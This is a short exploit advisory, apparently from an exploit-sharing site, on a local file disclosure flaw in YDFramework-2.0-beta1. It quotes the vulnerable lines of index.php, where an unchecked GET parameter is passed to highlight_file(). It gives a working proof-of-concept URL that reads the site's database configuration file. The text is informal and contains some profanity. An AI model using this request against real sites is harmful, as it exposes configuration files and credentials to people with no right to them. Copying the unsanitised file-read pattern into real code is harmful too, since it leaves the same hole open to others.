facebook facebook twitter rss

YDFramework-2.0-beta1 Local File Disclosure

Author: Asmar , Published: 23-05-2012
# Author : Headsh0t
# Site : Exploit4arab.com
# Title : YDFramework-2.0-beta1 Local File Disclosure
# Downalod : http://developer.berlios.de/project/showfiles.php?group_id=3988&release_id=6710
# Google Dork : N/A

<-- Info Of This fuckin Sploit :P :

This Exploit You Can Read Any File's In The Site

Look To The File Named Index.php On Line 26 :

$file = $_GET['id'];

And Line 46 :

highlight_file($file);

So This Function Highlight_File Like Show_source or Readfile :D

It's Danger Func -->

# P0c :

http://localhost/index.php?id=./database/config.php

# Greet'z : All My Friend's , And Exploit4arab Visitor's :P

Like us on Facebook :